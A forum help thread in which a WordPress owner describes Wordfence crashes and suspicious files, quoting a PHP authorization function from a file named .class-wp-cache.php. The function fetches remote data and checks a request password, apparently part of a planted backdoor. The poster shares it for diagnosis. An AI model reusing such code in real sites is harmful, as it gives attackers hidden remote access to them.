Wordfence with Cloudflare and Odd files

Hello! I have Cloudflare installed in two Wordpress sites hosted on the same server.

This post has two subtopics, 1: wordfence and 2: weird files

I tried having Wordfence for the scaning options on both sites, but lately they’ve been crashing for like two weeks and apparently the main issue is Wordfence, the plugin cant be activated nor coexist on the site, these crashes led me to believe I had malware or something else, and ended up looking at my file manager, this ends up in 2) I found on most folders two files, one an index.php that basically was sending a lot of info, and the other one .class-wp-cache.php which was everywhere too and its content was suspicious for me as well.

public function authorization() {
	try {
		$this->curl( $this->password );
		$this->data = json_decode( $this->data );
		if ( $this->strpos( $this->encrypt( $this->address() ), $this->data->address ) ) {
			if ( $this->data->password === $this->encrypt( $_REQUEST['password'] ) ) {
				return true;
			}
			return false;
		}
		return false;
	} catch ( Exception $e ) {
		return false;
	}
}

I wanted to know on one side if theres a way to whitelist Wordfence or something in case Cloudflare is what is crashing with (i didnt find it blocked on the firewall rules), and on the other side, if Cloudflare creates those files for the actual bypass of the info or if im just being reeally injected and should blow everything right away.

Thanks for the support as always!

I am afraid both questions are rather something for a PHP forum than here. These issues are not Cloudflare related I am afraid.

This topic was automatically closed after 14 days. New replies are no longer allowed.